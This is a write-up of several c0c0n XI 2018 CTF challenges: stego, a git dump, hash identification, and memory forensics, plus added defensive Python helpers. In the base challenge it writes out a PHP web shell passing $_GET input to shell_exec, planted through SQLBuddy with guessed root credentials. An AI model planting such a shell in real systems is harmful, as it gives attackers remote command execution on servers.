c0c0n XI CTF Writeup

About c0c0n XI

c0c0n is an annual international cybersecurity, data privacy and hacking conference organised by the international public-private partnership led by the Society for the Policing of Cyberspace (POLCYB) in association with the Information Security Research Association (ISRA), Group of Technology Companies (GTec) and Kerala State IT Mission.

Capture the Flag

This time the Capture the Flag competition was organized by AppFabs and Kerala Police Cyberdome.

Registration

The registration was quite easy: the organizers noted down our names and contact details and gave us the rules, a hash that was needed to verify the registration on the CTF platform, and a really cool badge.

Platform Interface

Each team consisted of 2 players and the platform provided challenges based on WEB, CRYPTO, FORENSICS and MISC.

The game started by 10am on 5/10/2018 and by that time around 35 teams had registered for the game. Phew, that's a hell of a lot of people, as this was only my 2nd CTF competition.

Challenges

In this one we had a zip file with some content. We extracted it and found 3 image files.

Running strings showed that a txt file was embedded in each of the images. Using binwalk we extracted the embedded files; the flag had been split into 3 parts and embedded in the images.

domectf{VUOtDSJ1B7PW6XuEUu9Rfp9UFrN3G6VK} and there is the flag
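As an added example (not part of the original write-up), here is a small Python carver for what strings and binwalk showed above: PNG and JPEG both have a well-defined end-of-image marker, so anything after it is appended data, and the three fragments can be reassembled in file order. The images and the flag fragments below are constructed samples.

```python
import struct

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"

def png_end(data: bytes) -> int:
    """Walk the chunk list and return the offset just past the IEND chunk (0 if none)."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4          # length/type header + payload + CRC
        if ctype == b"IEND":
            return pos
    return 0

def jpeg_end(data: bytes) -> int:
    """A JPEG ends at its EOI marker (FF D9); caveat: an EXIF thumbnail carries its own EOI."""
    idx = data.find(b"\xff\xd9", 2)
    return idx + 2 if idx != -1 else 0

def trailing_data(data: bytes) -> bytes:
    """Return whatever was appended after a PNG or JPEG end-of-image marker."""
    if data.startswith(PNG_SIG):
        end = png_end(data)
    elif data.startswith(JPEG_SOI):
        end = jpeg_end(data)
    else:
        return b""
    return data[end:] if end else b""

def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Constructed helper: a chunk with a zero CRC (the parser above does not verify it)."""
    return struct.pack(">I", len(payload)) + ctype + payload + b"\0\0\0\0"

# Constructed samples: three tiny "images", each carrying a third of a made-up flag.
SAMPLES = {
    "1.png": PNG_SIG + png_chunk(b"IHDR", b"\0" * 13) + png_chunk(b"IEND", b"") + b"flag{part",
    "2.jpg": JPEG_SOI + b"\xff\xe0\x00\x02" + b"\xff\xd9" + b"_one_",
    "3.png": PNG_SIG + png_chunk(b"IHDR", b"\0" * 13) + png_chunk(b"IEND", b"") + b"two}",
}

def reassemble(samples: dict) -> str:
    """Concatenate the fragments in filename order, the way the challenge split its flag."""
    return b"".join(trailing_data(samples[n]) for n in sorted(samples)).decode("ascii", "replace")
```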

This was a web challenge that pointed to a login page.

While my teammate looked for issues in the LOGIN, I ran dirb on the URL, which returned something good:

a .git directory. So we tried gitdumper to dump the content of the git directory.

The first thing I did was to check the commit logs, but the organizers made it difficult by making changes to the HEAD, which returned an error. Though I tried to correct the errors, I failed. Hmmm, what could be done? There is a tool called gitextractor which scans a git directory and extracts files from commits.
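Why a corrupted HEAD did not stop the extraction, as an added example rather than gitextractor's own code: every loose object under .git/objects carries its own type header and is addressed by its hash, so commits, trees and blobs can be walked directly without refs. The repository below is constructed in a temporary directory with no HEAD or refs at all; the takeaway for anyone deploying a site is that only denying web access to .git prevents the leak.

```python
import hashlib, os, tempfile, zlib

def write_object(git_dir, otype, body):
    """Store a loose object the way git does: zlib(header + body) under objects/xx/yyyy."""
    raw = f"{otype} {len(body)}\0".encode() + body
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.join(git_dir, "objects", sha[:2]), exist_ok=True)
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha

def read_object(git_dir, sha):
    """Inflate a loose object and split off its 'type size\\0' header."""
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "rb") as fh:
        header, body = zlib.decompress(fh.read()).split(b"\0", 1)
    return header.split()[0].decode(), body

def tree_files(git_dir, tree_sha, prefix=""):
    """Map path -> blob bytes for a tree; entries are 'mode name\\0' + 20-byte SHA."""
    files, body, pos = {}, read_object(git_dir, tree_sha)[1], 0
    while pos < len(body):
        nul = body.index(b"\0", pos)
        mode, name = body[pos:nul].split(b" ", 1)
        sha, pos = body[nul + 1:nul + 21].hex(), nul + 21
        path = prefix + name.decode()
        if mode == b"40000":
            files.update(tree_files(git_dir, sha, path + "/"))
        else:
            files[path] = read_object(git_dir, sha)[1]
    return files

def dump_all_commits(git_dir):
    """Walk objects/ directly, never touching HEAD or refs, and collect each commit's files."""
    result, root = {}, os.path.join(git_dir, "objects")
    for d in os.listdir(root):
        for f in (os.listdir(os.path.join(root, d)) if len(d) == 2 else []):
            otype, body = read_object(git_dir, d + f)
            if otype == "commit":
                tree_sha = body.split(b"\n", 1)[0].split()[1].decode()
                result[d + f] = tree_files(git_dir, tree_sha)
    return result

def demo():
    """Constructed repo with one commit and no HEAD or refs at all (hypothetical sample)."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    blob = write_object(git_dir, "blob", b"<?php $db_pass = 'constructed-sample';")
    tree = write_object(git_dir, "tree", b"100644 config.php\0" + bytes.fromhex(blob))
    write_object(git_dir, "commit", f"tree {tree}\nauthor x <x@x> 0 +0000\n\ninitial\n".encode())
    return dump_all_commits(git_dir)
```

Packed objects under .git/objects/pack are not handled here; those need the packfile format as well.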

FLAG

This challenge offered a large string of data (Base64) which was encoded multiple times. By decoding it we ended up with a quite unusual thing:

$9$GQUjqAtOhSeTz6AtuhcvWLNYoHqfQF6Ctrv8Xbwq.PQnC1RSKWxtuyeWLdVPfTz9tyrv8X-tuKW8Lbw.mf56CRESreM5QlvL7bwQz3npORhyrvL7-PQF/OB

We checked with the hashcat example hashes and it returned a CISCO hash.

Well, that wasn't the hash; it was a Juniper hash.

LOL this took some time
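As an added example (not from the write-up), the Python below peels the nested Base64 layers and then tells the two unrelated "$9$" formats apart: hashcat's example list shows Cisco IOS type 9 (scrypt, with two more "$" separators), whereas the Juniper string has none and is a reversible obfuscation rather than a hash. The layered blob is rebuilt from the string above with a constructed helper, since the original blob is not reproduced in the write-up.

```python
import base64
import binascii
import re

def peel_base64(blob: str, max_layers: int = 32):
    """Strip nested Base64 layers until the text no longer decodes to printable ASCII."""
    current, layers = blob.strip(), 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        if not decoded.isprintable():
            break
        current, layers = decoded.strip(), layers + 1
    return current, layers

def classify_dollar9(secret: str) -> str:
    """Tell apart the two unrelated formats that share the '$9$' prefix."""
    if not secret.startswith("$9$"):
        return "not a $9$ string"
    # Cisco IOS type 9 (scrypt): $9$<14-char salt>$<43-char hash>, i.e. two more '$' separators.
    if re.fullmatch(r"\$9\$[A-Za-z0-9./]{14}\$[A-Za-z0-9./]{43}", secret):
        return "cisco-ios-type9-scrypt"
    # Juniper $9$: no further '$', alphabet includes '-'; a reversible obfuscation, not a hash.
    if re.fullmatch(r"\$9\$[A-Za-z0-9./-]+", secret):
        return "juniper-type9-obfuscated"
    return "unknown $9$ variant"

# The string the challenge decoded to (taken from the write-up above).
JUNIPER_SAMPLE = ("$9$GQUjqAtOhSeTz6AtuhcvWLNYoHqfQF6Ctrv8Xbwq.PQnC1RSKWxtuyeWLdVPfTz9"
                  "tyrv8X-tuKW8Lbw.mf56CRESreM5QlvL7bwQz3npORhyrvL7-PQF/OB")

def wrap_base64(text: str, times: int) -> str:
    """Constructed helper: rebuild a multi-layer blob like the one the challenge handed out."""
    for _ in range(times):
        text = base64.b64encode(text.encode("ascii")).decode("ascii")
    return text

def solve(blob: str):
    """Peel the layers, then identify what came out."""
    inner, layers = peel_base64(blob)
    return inner, layers, classify_dollar9(inner)
```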

This challenge had a password-protected PDF file whose password we had to find. We tried pdfcrack and all sorts of tools from our arsenal, yet no valid password; then for a change we tried the CTF name (domectf), and everyone who solved it must have facepalmed themselves.

This challenge was quite interesting. As the challenge type says "base", all we had to do was get code execution, write the team name to /tmp/DOMECTF_BASE and guard it from other teams. When done correctly the team gains 1 point every 5 minutes or so (correct me if I am wrong) plus a base point of 200.

Tried dirb and other tools, nothing interesting. Time to fire up BURP SUITE; I ran the spider against it and it found a LOGIN to SQLBUDDY (it's 2am at night).

The username was root and the password we had to guess; we found the password, i.e. "password" XD. Valid LOGIN.

Now we could execute code, but we had some problems. After hours of head banging we figured out that the organizers had blocked functions such as system; the only things that went past were exec and shell_exec.

We created a database and a table and inserted <?php echo shell_exec($_GET['e'].' 2>&1'); ?> as the value, with text as the datatype. Now, to get a shell, all we needed to do was export it to a php file.

CODE EXEC

And we wrote our team name to the DOMECTF_BASE file. Now we had to defend it, so I wrote some crappy code that logs in automatically to SQLBUDDY, creates the database and does the rest of the stuff. Though my code failed in several areas, it was Sreehari's skills that kept us guarding the base.
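An added example of the defender's side of this challenge (not the organizers' code): a check over a php.ini disable_functions value that reports which command sinks are still callable when only system is listed, and a line scanner that flags the exported one-liner pattern (request input reaching shell_exec/exec, or backticks). The PHP snippet is a constructed sample built around the payload from the write-up.

```python
import re

# PHP functions that hand a string to the OS. The event blocked only system(), leaving the rest.
COMMAND_SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "pcntl_exec")
SINK_CALL = re.compile(r"\b(" + "|".join(COMMAND_SINKS) + r")\s*\(", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES)\b")
BACKTICK_INPUT = re.compile(r"`[^`]*\$_(GET|POST|REQUEST|COOKIE)[^`]*`")

def still_enabled(disable_functions: str) -> list:
    """Given a php.ini disable_functions value, list the command sinks it leaves callable."""
    blocked = {f.strip().lower() for f in disable_functions.split(",") if f.strip()}
    return [s for s in COMMAND_SINKS if s not in blocked]

WEAK_INI = "system"                        # what the write-up observed: exec/shell_exec still open
HARDENED_INI = ",".join(COMMAND_SINKS)     # every sink listed; still_enabled() returns []

def scan_php(source: str) -> list:
    """Return (line_no, sink) for each line where request input reaches a command sink."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        call = SINK_CALL.search(line)
        if call and REQUEST_INPUT.search(line):
            findings.append((no, call.group(1).lower()))
        elif BACKTICK_INPUT.search(line):
            findings.append((no, "backtick"))   # `...` is shell_exec in disguise
    return findings

# Constructed sample: the exported one-liner from the write-up next to benign and fixed-command code.
SAMPLE_PHP = """<?php
$title = htmlspecialchars($_GET['title']);
echo shell_exec($_GET['e'].' 2>&1');
echo `ls $_GET['d']`;
exec('ls -l', $out);
?>"""
```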

This challenge was quite frustrating, as the link pointed to a 7z file which was around 300MB. The problem was that at the event there were so many network problems that it took me 3 attempts to complete the download.

Extracting the file gave a file.raw. From my experience playing CTFs on hackthebox I instantly knew it was a memory dump, so we needed to extract the data from it. I used a tool called foremost, which is a forensics carving tool,

which dumped a HELL of a lot of data.

While searching in the extracted data there was a zip file that contained the flag, which was password protected.

In the previous screenshot it's clear that the memory is from a Windows machine. Now to find the password we tried fcrackzip with different wordlists but nothing gave us the password, so I was sure that the password must be in the memory dump. This was my first time using volatility.

First we had to figure out which version of Windows the memory dump belongs to.

That’s the password for the zip file
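As an added example that is not part of the original write-up, the carver below does for ZIP what foremost did for the dump: it finds local file headers in a raw image and reads the general-purpose flag, whose bit 0 says up front whether an entry is encrypted, so you know to go looking for the password in the dump instead of a wordlist. The "memory image" is a constructed byte string.

```python
import struct

LOCAL_HDR = b"PK\x03\x04"
# signature, version, flags, method, mtime, mdate, crc32, csize, usize, name_len, extra_len
LOCAL_HDR_FMT = "<4sHHHHHIIIHH"

def carve_zip_entries(image: bytes) -> list:
    """Find every ZIP local file header in a raw image; report name, sizes and the encryption bit."""
    entries, pos = [], 0
    while True:
        pos = image.find(LOCAL_HDR, pos)
        if pos == -1 or pos + 30 > len(image):
            break
        fields = struct.unpack(LOCAL_HDR_FMT, image[pos:pos + 30])
        _, _, flags, method, _, _, _, csize, usize, name_len, extra_len = fields
        name_start = pos + 30
        entries.append({
            "offset": pos,
            "name": image[name_start:name_start + name_len].decode("utf-8", "replace"),
            "method": method,
            "compressed_size": csize,
            "uncompressed_size": usize,
            "encrypted": bool(flags & 0x0001),   # general-purpose bit 0: traditional PKZIP encryption
        })
        pos = name_start + name_len + extra_len + csize   # skip the payload before searching on
    return entries

def local_header(name: bytes, payload: bytes, encrypted: bool) -> bytes:
    """Constructed helper: one stored (uncompressed) entry with or without the encryption bit."""
    flags = 0x0001 if encrypted else 0
    hdr = struct.pack(LOCAL_HDR_FMT, LOCAL_HDR, 20, flags, 0, 0, 0, 0,
                      len(payload), len(payload), len(name), 0)
    return hdr + name + payload

# Constructed "memory image": junk, an encrypted entry holding the flag, junk, a plain entry.
SAMPLE_IMAGE = (b"\x00" * 64 + b"process heap noise " * 3
                + local_header(b"flag.txt", b"\xde\xad" * 12, encrypted=True)
                + b"\xff" * 40
                + local_header(b"readme.txt", b"nothing here", encrypted=False)
                + b"\x00" * 16)
```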

domectf{ILko4kCKG6Bo4qtTnm7gm4gR1QhmDWUN}. By the time we figured this out the competition was over :( but we came 4th, which is not bad at all; competing with 50 teams and ending up 4th is not a small achievement.

These are the challenges that our team solved. There are more; I will try to complete the rest.

Thanks to my teammate Sreehari for helping me in many ways, thanks to team AppFabs, and congrats to RedX, RedRaptor and 0x00sec for securing the 1st, 2nd and 3rd places. Also I would like to thank NetObjex for sponsoring a ticket for the event and making my dream a reality.